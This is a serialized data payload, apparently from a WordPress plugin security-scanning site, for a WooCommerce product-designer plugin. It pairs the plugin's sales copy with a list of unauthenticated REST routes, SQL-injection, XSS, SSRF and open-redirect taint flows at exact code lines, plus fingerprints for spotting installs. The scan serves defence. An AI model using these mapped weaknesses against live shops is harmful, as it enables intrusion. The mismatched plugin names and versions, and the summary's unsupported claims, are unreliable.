customization\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Product Canvas System\u003C\u002Fstrong> – Upload base product images (t-shirts, mugs, covers, etc.)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Clipart Library\u003C\u002Fstrong> – Add pre-designed graphics customers can use in their designs\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Image Placement & Resizing\u003C\u002Fstrong> – Position and scale elements with precision\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Real-Time Preview\u003C\u002Fstrong> – Customers see their design as they create it\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Seamless WooCommerce Integration\u003C\u002Fstrong> – Works with your existing product catalog\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Easy Admin Setup\u003C\u002Fstrong> – Enable product customization with just a few clicks\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Pro Version Features – Unlock the Full Potential:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Unlimited Designable Products\u003C\u002Fstrong> – No restrictions on how many products can be customized\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Customer Image Upload\u003C\u002Fstrong> – Let buyers upload their own photos and logos\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Text Editor with Full Control\u003C\u002Fstrong> – Custom text with font selection, sizing, and color options\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Freehand Drawing Tool\u003C\u002Fstrong> – Pen tool for creative customers who want to draw\u003C\u002Fli>\n\u003Cli>\u003Cstrong>One-Click Design Download\u003C\u002Fstrong> – Customers can save their creations\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Dedicated Order Management\u003C\u002Fstrong> – View all customized orders in one place\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Priority Support\u003C\u002Fstrong> – Get help when you need it\u003C\u002Fli>\n\u003Cli>\u003Cstrong>14-Day Money-Back Guarantee\u003C\u002Fstrong> – Try risk-free\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Why Store Owners Choose Custom Product Builder:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Simple Setup\u003C\u002Fstrong> – Works out of the box, no coding required\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Affordable Pricing\u003C\u002Fstrong> – Budget-friendly alternative to premium product designers\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Self-Hosted Solution\u003C\u002Fstrong> – No dependency on external services, you control everything\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Lifetime License Available\u003C\u002Fstrong> – One-time payment option with 25% savings\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Regular Updates\u003C\u002Fstrong> – Continuously improved with new features\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Responsive Support\u003C\u002Fstrong> – Dedicated team ready to help\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Perfect For:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Print-on-demand businesses and POD entrepreneurs\u003C\u002Fli>\n\u003Cli>Custom merchandise and apparel stores\u003C\u002Fli>\n\u003Cli>Gift shops offering personalized products\u003C\u002Fli>\n\u003Cli>Jewelry makers with monogram services\u003C\u002Fli>\n\u003Cli>Promotional product companies\u003C\u002Fli>\n\u003Cli>Event and wedding favor businesses\u003C\u002Fli>\n\u003Cli>Anyone selling customizable products online\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Featured On:\u003C\u002Fstrong> Medium, WPGlob, YayCommerce, QuadLayers and more!\u003C\u002Fp>\n\u003Cp>Transform your WooCommerce store into a custom product design platform. Join 200+ successful store owners today!\u003C\u002Fp>\n","The WooCommerce product designer plugin trusted by 200+ stores. Let customers design custom t-shirts, mugs, phone cases, jewelry and more with an intu …",300,10820,"2026-03-30T06:33:00.000Z","6.2","7.0",[224,204,189,225,205],"print-on-demand","t-shirt-designer","https:\u002F\u002Fcoderpress.co\u002Fproducts\u002Fcoinbase-commerce-for-woocommerce\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-product-builder-for-woocommerce.1.1.1.zip",{"attackSurface":229,"codeSignals":722,"taintFlows":762,"riskAssessment":906,"analyzedAt":922},{"hooks":230,"ajaxHandlers":354,"restRoutes":366,"shortcodes":719,"cronEvents":720,"entryPointCount":721,"unprotectedCount":721},[231,237,241,245,249,253,257,261,265,269,273,277,281,285,289,293,297,301,306,310,314,318,322,326,330,334,338,342,346,350],{"type":232,"name":233,"callback":234,"file":235,"line":236},"action","plugins_loaded","init_woocommerce_action_filters","riaxe-product-designer.php",178,{"type":232,"name":238,"callback":239,"file":235,"line":240},"rest_api_init","inkxe_register_custom_routes",180,{"type":232,"name":242,"callback":243,"file":235,"line":244},"activated_plugin","ink_pd_activation_redirect",184,{"type":232,"name":246,"callback":247,"file":235,"line":248},"woocommerce_init","enable_wc_session_cookie",185,{"type":232,"name":250,"callback":251,"file":235,"line":252},"admin_enqueue_scripts","ink_pd_admin_scripts",267,{"type":232,"name":254,"callback":255,"file":235,"line":256},"woocommerce_process_product_meta","ink_pd_save_images",269,{"type":232,"name":258,"callback":259,"file":235,"line":260},"admin_init","ink_pd_media_columns",270,{"type":232,"name":262,"callback":263,"file":235,"line":264},"woocommerce_product_options_general_product_data","ink_pd_add_product_fields",271,{"type":232,"name":266,"callback":267,"file":235,"line":268},"woocommerce_order_item_add_action_buttons","ink_pd_action_woocommerce_order_item_add_action_buttons",272,{"type":232,"name":270,"callback":271,"file":235,"line":272},"admin_menu","ink_pd_add_menu_item",273,{"type":232,"name":274,"callback":275,"file":235,"line":276},"wp_enqueue_scripts","ink_pd_register_scripts_and_styles",275,{"type":232,"name":278,"callback":279,"priority":112,"file":235,"line":280},"woocommerce_add_order_item_meta","ink_pd_wdm_add_print_status_values_to_order_item_meta",276,{"type":232,"name":282,"callback":283,"priority":11,"file":235,"line":284},"woocommerce_before_calculate_totals","ink_pd_add_custom_total_price",277,{"type":232,"name":286,"callback":287,"priority":11,"file":235,"line":288},"woocommerce_after_add_to_cart_button","ink_pd_customize_button",278,{"type":232,"name":290,"callback":291,"priority":11,"file":235,"line":292},"woocommerce_before_add_to_cart_quantity","ink_pd_display_dropdown_variation_add_cart",279,{"type":232,"name":294,"callback":295,"priority":11,"file":235,"line":296},"woocommerce_after_add_to_cart_quantity","ink_pd_after_add_to_cart_quantity",280,{"type":232,"name":298,"callback":299,"file":235,"line":300},"template_redirect","ink_pd_template_redirect",281,{"type":302,"name":303,"callback":304,"priority":11,"file":235,"line":305},"filter","woocommerce_available_variation","ink_pd_alter_variation_json",282,{"type":302,"name":307,"callback":308,"file":235,"line":309},"woocommerce_thankyou","create_order_files",283,{"type":302,"name":311,"callback":312,"priority":11,"file":235,"line":313},"woocommerce_add_cart_item_data","ink_pd_add_cart_item_custom_data_vase",284,{"type":302,"name":315,"callback":316,"priority":11,"file":235,"line":317},"woocommerce_get_item_data","ink_pd_filter_woocommerce_get_item_data",285,{"type":302,"name":319,"callback":320,"priority":11,"file":235,"line":321},"woocommerce_cart_item_thumbnail","ink_pd_inkxe_customize_product_image",286,{"type":302,"name":323,"callback":324,"priority":11,"file":235,"line":325},"woocommerce_cart_item_name","ink_pd_add_edit_info_button",287,{"type":302,"name":327,"callback":328,"priority":11,"file":235,"line":329},"woocommerce_cart_item_quantity","ink_pd_disable_customize_product_cart_item_quantity",288,{"type":302,"name":331,"callback":332,"priority":11,"file":235,"line":333},"wc_get_template_part","imp_override_woocommerce_template_part",289,{"type":302,"name":315,"callback":335,"priority":336,"file":235,"line":337},"display_custom_field_as_item_data",20,290,{"type":302,"name":339,"callback":340,"file":235,"line":341},"wp_is_application_passwords_available","__return_false",292,{"type":232,"name":343,"callback":344,"file":235,"line":345},"before_woocommerce_init","closure",295,{"type":302,"name":347,"callback":348,"file":235,"line":349},"manage_media_columns","ink_pd_media_id_col",379,{"type":232,"name":351,"callback":352,"priority":11,"file":235,"line":353},"manage_media_custom_column","ink_pd_media_id_col_val",380,[355,359,362],{"action":356,"nopriv":46,"callback":357,"hasNonce":46,"hasCapCheck":46,"file":235,"line":358},"install-imprint","ink_pd_add_option",182,{"action":356,"nopriv":360,"callback":357,"hasNonce":46,"hasCapCheck":46,"file":235,"line":361},true,183,{"action":363,"nopriv":46,"callback":364,"hasNonce":46,"hasCapCheck":46,"file":235,"line":365},"admin_load_thumbnails","ink_pd_admin_load_thumbnails",268,[367,375,379,384,389,394,399,404,409,414,419,424,429,434,440,445,450,455,460,466,471,476,481,486,491,496,499,502,505,508,511,514,517,520,523,526,529,534,539,544,549,554,559,564,569,574,579,584,589,594,599,604,609,614,619,624,629,634,639,644,649,654,659,664,669,674,679,684,689,694,699,704,709,714],{"namespace":368,"route":369,"methods":370,"callback":372,"permissionCallback":373,"file":235,"line":374},"InkXEProductDesignerLite","\u002Forders",[371],"GET","imp_get_orders_latest_version_wc","__return_true",2802,{"namespace":368,"route":369,"methods":376,"callback":377,"permissionCallback":373,"file":235,"line":378},[371],"inkxe_get_orders",2813,{"namespace":368,"route":380,"methods":381,"callback":382,"permissionCallback":35,"file":235,"line":383},"\u002Fproduct_details_with_variations",[371],"inkxe_get_product_details_variation",2824,{"namespace":368,"route":385,"methods":386,"callback":387,"permissionCallback":35,"file":235,"line":388},"\u002Fproducts",[371],"inkxe_get_products",2835,{"namespace":368,"route":390,"methods":391,"callback":392,"permissionCallback":35,"file":235,"line":393},"\u002Foptions",[371],"inkxe_get_attribute_options",2846,{"namespace":368,"route":395,"methods":396,"callback":397,"permissionCallback":35,"file":235,"line":398},"\u002Fproduct\u002Fattributes",[371],"inkxe_get_product_attribute",2858,{"namespace":368,"route":400,"methods":401,"callback":402,"permissionCallback":35,"file":235,"line":403},"\u002Fproduct\u002Fcount",[371],"inkxe_get_product_count",2870,{"namespace":368,"route":405,"methods":406,"callback":407,"permissionCallback":35,"file":235,"line":408},"\u002Fcategories\u002Fproducts",[371],"inkxe_get_category_products",2881,{"namespace":368,"route":410,"methods":411,"callback":412,"permissionCallback":35,"file":235,"line":413},"\u002Fpath",[371],"wc_paths",2892,{"namespace":368,"route":415,"methods":416,"callback":417,"permissionCallback":35,"file":235,"line":418},"\u002Fproduct\u002Fimages",[371],"product_images",2901,{"namespace":368,"route":420,"methods":421,"callback":422,"permissionCallback":35,"file":235,"line":423},"\u002Fattributes",[371],"list_all_attributes",2913,{"namespace":368,"route":425,"methods":426,"callback":427,"permissionCallback":35,"file":235,"line":428},"\u002Fcustomer\u002Fmultiple_shipping_address",[371],"get_multiple_shipping_address",2923,{"namespace":368,"route":430,"methods":431,"callback":432,"permissionCallback":35,"file":235,"line":433},"\u002Fcustomer\u002Fdelete_shipping_address",[371],"delete_multiple_shipping_address",2934,{"namespace":368,"route":435,"methods":436,"callback":438,"permissionCallback":35,"file":235,"line":439},"\u002Fcustomer\u002Fupdate_shipping_address",[437],"POST","update_multiple_shipping_address",2945,{"namespace":368,"route":441,"methods":442,"callback":443,"permissionCallback":35,"file":235,"line":444},"\u002Fcustomer\u002Fcreate_shipping_address",[437],"create_multiple_shipping_address",2957,{"namespace":368,"route":446,"methods":447,"callback":448,"permissionCallback":35,"file":235,"line":449},"\u002Fcustomer\u002Fcreate_customer",[437],"inkxe_create_customer",2969,{"namespace":368,"route":451,"methods":452,"callback":453,"permissionCallback":35,"file":235,"line":454},"\u002Fcustomer\u002Fupdate_customer",[437],"inkxe_update_customer",2981,{"namespace":368,"route":456,"methods":457,"callback":458,"permissionCallback":35,"file":235,"line":459},"\u002Fcustomer\u002Fdelete_customer",[437],"inkxe_delete_customer",2993,{"namespace":368,"route":461,"methods":462,"callback":464,"permissionCallback":35,"file":235,"line":465},"\u002Fget_countries",[463],"get","get_countries",3005,{"namespace":368,"route":467,"methods":468,"callback":469,"permissionCallback":35,"file":235,"line":470},"\u002Fget_states",[463],"get_states",3015,{"namespace":368,"route":472,"methods":473,"callback":474,"permissionCallback":35,"file":235,"line":475},"\u002Fcustomer\u002Fget_country_name",[463],"get_country_name",3026,{"namespace":368,"route":477,"methods":478,"callback":479,"permissionCallback":35,"file":235,"line":480},"\u002Fcustomer\u002Fget_state_name",[463],"get_state_name",3037,{"namespace":368,"route":482,"methods":483,"callback":484,"permissionCallback":35,"file":235,"line":485},"\u002Fcustomer_count",[463],"user_count",3048,{"namespace":368,"route":487,"methods":488,"callback":489,"permissionCallback":35,"file":235,"line":490},"\u002Forder_shipping_address",[371],"get_order_shipping_address",3059,{"namespace":368,"route":492,"methods":493,"callback":494,"permissionCallback":35,"file":235,"line":495},"\u002Fstore_order_statuses",[371],"get_store_order_statuses",3070,{"namespace":368,"route":425,"methods":497,"callback":427,"permissionCallback":35,"file":235,"line":498},[371],3081,{"namespace":368,"route":430,"methods":500,"callback":432,"permissionCallback":35,"file":235,"line":501},[371],3092,{"namespace":368,"route":435,"methods":503,"callback":438,"permissionCallback":35,"file":235,"line":504},[437],3103,{"namespace":368,"route":441,"methods":506,"callback":443,"permissionCallback":35,"file":235,"line":507},[437],3115,{"namespace":368,"route":446,"methods":509,"callback":448,"permissionCallback":35,"file":235,"line":510},[437],3126,{"namespace":368,"route":451,"methods":512,"callback":453,"permissionCallback":35,"file":235,"line":513},[437],3138,{"namespace":368,"route":456,"methods":515,"callback":458,"permissionCallback":35,"file":235,"line":516},[437],3150,{"namespace":368,"route":461,"methods":518,"callback":464,"permissionCallback":35,"file":235,"line":519},[463],3162,{"namespace":368,"route":467,"methods":521,"callback":469,"permissionCallback":35,"file":235,"line":522},[463],3173,{"namespace":368,"route":472,"methods":524,"callback":474,"permissionCallback":35,"file":235,"line":525},[463],3185,{"namespace":368,"route":477,"methods":527,"callback":479,"permissionCallback":35,"file":235,"line":528},[463],3197,{"namespace":368,"route":530,"methods":531,"callback":532,"permissionCallback":35,"file":235,"line":533},"\u002Forders\u002Farchive",[437],"archive_order",3208,{"namespace":368,"route":535,"methods":536,"callback":537,"permissionCallback":35,"file":235,"line":538},"\u002Fcustomers",[371],"list_all_customers",3218,{"namespace":368,"route":540,"methods":541,"callback":542,"permissionCallback":35,"file":235,"line":543},"\u002Fcountry_state_name",[371],"get_country_state_name",3230,{"namespace":368,"route":545,"methods":546,"callback":547,"permissionCallback":35,"file":235,"line":548},"\u002Fcustomer_details",[371],"get_customer_details",3241,{"namespace":368,"route":550,"methods":551,"callback":552,"permissionCallback":35,"file":235,"line":553},"\u002Fproducts_categories",[371],"get_product_categories",3252,{"namespace":368,"route":555,"methods":556,"callback":557,"permissionCallback":35,"file":235,"line":558},"\u002Fproducts\u002Fattributes",[371],"get_product_attributes",3264,{"namespace":368,"route":560,"methods":561,"callback":562,"permissionCallback":35,"file":235,"line":563},"\u002Fproducts\u002Fattributes\u002Fterms",[371],"get_product_attributes_terms",3276,{"namespace":368,"route":565,"methods":566,"callback":567,"permissionCallback":35,"file":235,"line":568},"\u002Fproducts\u002Fattributes\u002Fcreate",[437],"create_product_attributes",3288,{"namespace":368,"route":570,"methods":571,"callback":572,"permissionCallback":35,"file":235,"line":573},"\u002Forder_details",[371],"get_order_details",3299,{"namespace":368,"route":575,"methods":576,"callback":577,"permissionCallback":35,"file":235,"line":578},"\u002Forder_item_details",[371],"get_order_item_details",3310,{"namespace":368,"route":580,"methods":581,"callback":582,"permissionCallback":35,"file":235,"line":583},"\u002Fmulti_store",[371],"all_blogs_list",3321,{"namespace":368,"route":585,"methods":586,"callback":587,"permissionCallback":35,"file":235,"line":588},"\u002Fproduct-details",[371],"inkxe_get_products_details",3332,{"namespace":368,"route":590,"methods":591,"callback":592,"permissionCallback":35,"file":235,"line":593},"\u002Fproduct-variants",[371],"inkxe_get_products_variants",3344,{"namespace":368,"route":595,"methods":596,"callback":597,"permissionCallback":35,"file":235,"line":598},"\u002Fproduct-categories",[371],"inkxe_get_products_categories",3356,{"namespace":368,"route":600,"methods":601,"callback":602,"permissionCallback":35,"file":235,"line":603},"\u002Fproducts-save-tier",[437],"inkxe_save_tier",3369,{"namespace":368,"route":605,"methods":606,"callback":607,"permissionCallback":35,"file":235,"line":608},"\u002Fproduct-get-tier",[371],"inkxe_get_tier",3380,{"namespace":368,"route":610,"methods":611,"callback":612,"permissionCallback":35,"file":235,"line":613},"\u002Fproduct-description",[371],"inkxe_get_product_description",3390,{"namespace":368,"route":615,"methods":616,"callback":617,"permissionCallback":35,"file":235,"line":618},"\u002Fproducts-remove-categories",[371],"inkxe_remove_categories",3400,{"namespace":368,"route":620,"methods":621,"callback":622,"permissionCallback":35,"file":235,"line":623},"\u002Fcreate-product-catagories",[437],"inkxe_create_categories",3410,{"namespace":368,"route":625,"methods":626,"callback":627,"permissionCallback":35,"file":235,"line":628},"\u002Fcategories-subcategories",[371],"inkxe_get_categories_subcategories",3420,{"namespace":368,"route":630,"methods":631,"callback":632,"permissionCallback":35,"file":235,"line":633},"\u002Fcheck-create-attribute",[437],"inkxe_check_create_attribute",3430,{"namespace":368,"route":635,"methods":636,"callback":637,"permissionCallback":35,"file":235,"line":638},"\u002Fcreate-new-attribute",[437],"inkxe_create_new_attribute",3440,{"namespace":368,"route":640,"methods":641,"callback":642,"permissionCallback":35,"file":235,"line":643},"\u002Fcreate-attribute",[437],"inkxe_create_attribute",3450,{"namespace":368,"route":645,"methods":646,"callback":647,"permissionCallback":35,"file":235,"line":648},"\u002Fsingle-customer",[371],"get_customer_details_with_order",3460,{"namespace":368,"route":650,"methods":651,"callback":652,"permissionCallback":35,"file":235,"line":653},"\u002Ftotal-user-count",[371],"total_customer_count",3470,{"namespace":368,"route":655,"methods":656,"callback":657,"permissionCallback":35,"file":235,"line":658},"\u002Fcustomer-id",[371],"get_customer_id",3480,{"namespace":368,"route":660,"methods":661,"callback":662,"permissionCallback":35,"file":235,"line":663},"\u002Fquote-customer-details",[371],"get_quote_customer_details",3490,{"namespace":368,"route":665,"methods":666,"callback":667,"permissionCallback":35,"file":235,"line":668},"\u002Fattributes-terms",[371],"get_attributes_terms",3500,{"namespace":368,"route":670,"methods":671,"callback":672,"permissionCallback":35,"file":235,"line":673},"\u002Fvariants-combination",[437],"save_variants_combination",3510,{"namespace":368,"route":675,"methods":676,"callback":677,"permissionCallback":35,"file":235,"line":678},"\u002Forder-log",[371],"get_order_log",3523,{"namespace":368,"route":680,"methods":681,"callback":682,"permissionCallback":35,"file":235,"line":683},"\u002Fupdate-order-status",[437],"update_order_status",3533,{"namespace":368,"route":685,"methods":686,"callback":687,"permissionCallback":35,"file":235,"line":688},"\u002Fcustomer-address",[371],"get_customer_address",3543,{"namespace":368,"route":690,"methods":691,"callback":692,"permissionCallback":35,"file":235,"line":693},"\u002Fcreate-order",[437],"create_custom_order",3553,{"namespace":368,"route":695,"methods":696,"callback":697,"permissionCallback":35,"file":235,"line":698},"\u002Fline-item-details",[371],"get_line_item_details",3563,{"namespace":368,"route":700,"methods":701,"callback":702,"permissionCallback":35,"file":235,"line":703},"\u002Fadd-item-to-cart",[437],"imprint_addtocart",3576,{"namespace":368,"route":705,"methods":706,"callback":707,"permissionCallback":35,"file":235,"line":708},"\u002Fcusomize-enabled",[371],"im_product_cusomize_enabled",3589,{"namespace":368,"route":710,"methods":711,"callback":712,"permissionCallback":35,"file":235,"line":713},"\u002Fproduct-options",[371],"inkxe_get_products_options",3603,{"namespace":368,"route":715,"methods":716,"callback":717,"permissionCallback":35,"file":235,"line":718},"\u002Fproduct-images",[371],"inkxe_get_products_images",3618,[],[],77,{"dangerousFunctions":723,"sqlUsage":724,"outputEscaping":741,"fileOperations":141,"externalRequests":743,"nonceChecks":141,"capabilityChecks":141,"bundledLibraries":761},[],{"prepared":725,"raw":726,"locations":727},55,5,[728,731,733,736,739],{"file":235,"line":729,"context":730},1455,"$wpdb->get_results() with variable interpolation",{"file":235,"line":732,"context":730},1469,{"file":235,"line":734,"context":735},5104,"$wpdb->query() with variable interpolation",{"file":235,"line":737,"context":738},5804,"$wpdb->get_var() with variable interpolation",{"file":235,"line":740,"context":738},6876,{"escaped":742,"rawEcho":743,"locations":744},49,7,[745,748,750,752,754,757,758],{"file":235,"line":746,"context":747},466,"raw output",{"file":235,"line":749,"context":747},942,{"file":235,"line":751,"context":747},7233,{"file":235,"line":753,"context":747},7236,{"file":755,"line":756,"context":747},"templates\\product-designer.php",11,{"file":755,"line":25,"context":747},{"file":759,"line":760,"context":747},"views\\admin\\imprint-deactive.php",33,[],[763,785,798,812,825],{"entryPoint":764,"graph":765,"unsanitizedCount":165,"severity":60},"ink_pd_register_scripts_and_styles (riaxe-product-designer.php:481)",{"nodes":766,"edges":782},[767,772,776],{"id":768,"type":769,"label":770,"file":235,"line":771},"n0","source","$_SERVER (x2)",524,{"id":773,"type":774,"label":775,"file":235,"line":771},"n1","transform","→ create_order_files()",{"id":777,"type":778,"label":779,"file":235,"line":780,"wp_function":781},"n2","sink","wp_remote_get() [SSRF]",668,"wp_remote_get",[783,784],{"from":768,"to":773,"sanitized":46},{"from":773,"to":777,"sanitized":46},{"entryPoint":786,"graph":787,"unsanitizedCount":112,"severity":60},"ink_pd_template_redirect (riaxe-product-designer.php:7249)",{"nodes":788,"edges":796},[789,792],{"id":768,"type":769,"label":790,"file":235,"line":791},"$_REQUEST",7263,{"id":773,"type":778,"label":793,"file":235,"line":794,"wp_function":795},"wp_redirect() [Open Redirect]",7265,"wp_redirect",[797],{"from":768,"to":773,"sanitized":46},{"entryPoint":799,"graph":800,"unsanitizedCount":141,"severity":811},"ink_pd_admin_load_thumbnails (riaxe-product-designer.php:454)",{"nodes":801,"edges":809},[802,805],{"id":768,"type":769,"label":803,"file":235,"line":804},"$_GET (x2)",455,{"id":773,"type":778,"label":806,"file":235,"line":807,"wp_function":808},"echo() [XSS]",471,"echo",[810],{"from":768,"to":773,"sanitized":360},"low",{"entryPoint":813,"graph":814,"unsanitizedCount":112,"severity":37},"get_post_id_from_slug (riaxe-product-designer.php:342)",{"nodes":815,"edges":823},[816,819],{"id":768,"type":769,"label":817,"file":235,"line":818},"$_SERVER",344,{"id":773,"type":778,"label":820,"file":235,"line":821,"wp_function":822},"get_var() [SQLi]",346,"get_var",[824],{"from":768,"to":773,"sanitized":46},{"entryPoint":826,"graph":827,"unsanitizedCount":905,"severity":37},"\u003Criaxe-product-designer> (riaxe-product-designer.php:0)",{"nodes":828,"edges":891},[829,830,831,832,834,838,840,843,848,851,853,855,860,862,867,871,873,875,877,879,881,883,886,889],{"id":768,"type":769,"label":817,"file":235,"line":818},{"id":773,"type":778,"label":820,"file":235,"line":821,"wp_function":822},{"id":777,"type":769,"label":803,"file":235,"line":804},{"id":833,"type":778,"label":806,"file":235,"line":807,"wp_function":808},"n3",{"id":835,"type":769,"label":836,"file":235,"line":837},"n4","$_SERVER (x4)",520,{"id":839,"type":778,"label":779,"file":235,"line":780,"wp_function":781},"n5",{"id":841,"type":769,"label":842,"file":235,"line":837},"n6","$_SERVER (x7)",{"id":844,"type":778,"label":845,"file":235,"line":846,"wp_function":847},"n7","get_results() [SQLi]",682,"get_results",{"id":849,"type":769,"label":850,"file":235,"line":837},"n8","$_SERVER (x3)",{"id":852,"type":778,"label":806,"file":235,"line":749,"wp_function":808},"n9",{"id":854,"type":769,"label":817,"file":235,"line":837},"n10",{"id":856,"type":778,"label":857,"file":235,"line":858,"wp_function":859},"n11","get_row() [SQLi]",1900,"get_row",{"id":861,"type":769,"label":770,"file":235,"line":837},"n12",{"id":863,"type":778,"label":864,"file":235,"line":865,"wp_function":866},"n13","query() [SQLi]",3836,"query",{"id":868,"type":769,"label":869,"file":235,"line":870},"n14","$_POST",5045,{"id":872,"type":778,"label":820,"file":235,"line":737,"wp_function":822},"n15",{"id":874,"type":769,"label":790,"file":235,"line":791},"n16",{"id":876,"type":778,"label":793,"file":235,"line":794,"wp_function":795},"n17",{"id":878,"type":769,"label":770,"file":235,"line":771},"n18",{"id":880,"type":774,"label":775,"file":235,"line":771},"n19",{"id":882,"type":778,"label":779,"file":235,"line":780,"wp_function":781},"n20",{"id":884,"type":769,"label":836,"file":235,"line":885},"n21",1930,{"id":887,"type":774,"label":888,"file":235,"line":885},"n22","→ get_attribute_type()",{"id":890,"type":778,"label":857,"file":235,"line":858,"wp_function":859},"n23",[892,893,894,895,896,897,898,899,900,901,902,903,904],{"from":768,"to":773,"sanitized":46},{"from":777,"to":833,"sanitized":360},{"from":835,"to":839,"sanitized":46},{"from":841,"to":844,"sanitized":46},{"from":849,"to":852,"sanitized":46},{"from":854,"to":856,"sanitized":46},{"from":861,"to":863,"sanitized":46},{"from":868,"to":872,"sanitized":46},{"from":874,"to":876,"sanitized":46},{"from":878,"to":880,"sanitized":46},{"from":880,"to":882,"sanitized":46},{"from":884,"to":887,"sanitized":46},{"from":887,"to":890,"sanitized":46},26,{"summary":907,"deductions":908},"The riaxe-product-customizer v2.1.2 plugin exhibits a severely insecure security posture due to a massive number of unprotected entry points. All 77 identified entry points, including AJAX handlers and REST API routes, lack any form of authentication or permission checks. This directly exposes the plugin's functionality to unauthenticated users, creating a significant risk of unauthorized access and potential manipulation of product customization features. While the code shows some positive signs with a high percentage of prepared SQL statements and properly escaped outputs, these strengths are overshadowed by the fundamental lack of access control across its entire attack surface. The absence of any known vulnerability history is a positive indicator of past development, but it does not mitigate the current, critical security flaws identified in the static analysis. The taint analysis further highlights critical vulnerabilities with unsanitized paths, indicating potential for file inclusion or command injection if these flows are exploited.\n\nIn conclusion, despite some good coding practices observed in SQL and output handling, the riaxe-product-customizer v2.1.2 plugin is highly vulnerable due to its completely exposed attack surface and the presence of critical unsanitized data flows. The lack of any authentication on numerous entry points is a critical design flaw. While the plugin has a clean vulnerability history, this analysis reveals immediate and severe risks that require urgent attention. Recommendations would focus on implementing robust authentication and authorization checks for all AJAX handlers and REST API routes, and thoroughly sanitizing all inputs identified in the taint analysis.",[909,911,913,915,918,920],{"reason":910,"points":11},"All AJAX handlers lack authentication checks",{"reason":912,"points":11},"All REST API routes lack permission callbacks",{"reason":914,"points":199},"Taint analysis: 2 high severity unsanitized flows",{"reason":916,"points":917},"Taint analysis: 4 total unsanitized path flows",8,{"reason":919,"points":726},"No nonce checks on any entry points",{"reason":921,"points":726},"No capability checks on any entry points","2026-03-17T00:03:04.353Z",{"wat":924,"direct":939},{"assetPaths":925,"generatorPatterns":931,"scriptPaths":932,"versionParams":933},[926,927,928,929,930],"\u002Fwp-content\u002Fplugins\u002Friaxe-product-customizer\u002Fassets\u002Fcss\u002Fstyle.css","\u002Fwp-content\u002Fplugins\u002Friaxe-product-customizer\u002Fassets\u002Fjs\u002Fcustomizer.js","\u002Fwp-content\u002Fplugins\u002Friaxe-product-customizer\u002Fassets\u002Fjs\u002Ffrontend.js","\u002Fwp-content\u002Fplugins\u002Friaxe-product-customizer\u002Fassets\u002Fjs\u002Fadmin-script.js","\u002Fwp-content\u002Fplugins\u002Friaxe-product-customizer\u002Fassets\u002Fjs\u002Fcustom_script.js",[],[927,928,929,930],[934,935,936,937,938],"riaxe-product-customizer\u002Fassets\u002Fcss\u002Fstyle.css?ver=","riaxe-product-customizer\u002Fassets\u002Fjs\u002Fcustomizer.js?ver=","riaxe-product-customizer\u002Fassets\u002Fjs\u002Ffrontend.js?ver=","riaxe-product-customizer\u002Fassets\u002Fjs\u002Fadmin-script.js?ver=","riaxe-product-customizer\u002Fassets\u002Fjs\u002Fcustom_script.js?ver=",{"cssClasses":940,"htmlComments":944,"htmlAttributes":947,"restEndpoints":950,"jsGlobals":954,"shortcodeOutput":957},[941,942,943],"inkxe-customizer","inkxe_customize_wrap","inkxe-product-designer-lite",[945,946],"\u003C!-- Riaxe Product Customizer -->","\u003C!-- Riaxe Product Designer Lite -->",[948,949],"data-product-id","data-customizer-url",[951,952,953],"\u002Fwp-json\u002Friaxe-product-customizer\u002Fv1\u002Fget_products","\u002Fwp-json\u002Friaxe-product-customizer\u002Fv1\u002Fsave_design","\u002Fwp-json\u002Friaxe-product-customizer\u002Fv1\u002Fget_design",[955,956],"InkxeProductDesigner","riaxe_product_customizer_params",[958],"[riaxe_product_customizer]",{"slug":4,"current_version":6,"total_versions":141,"versions":960},[]]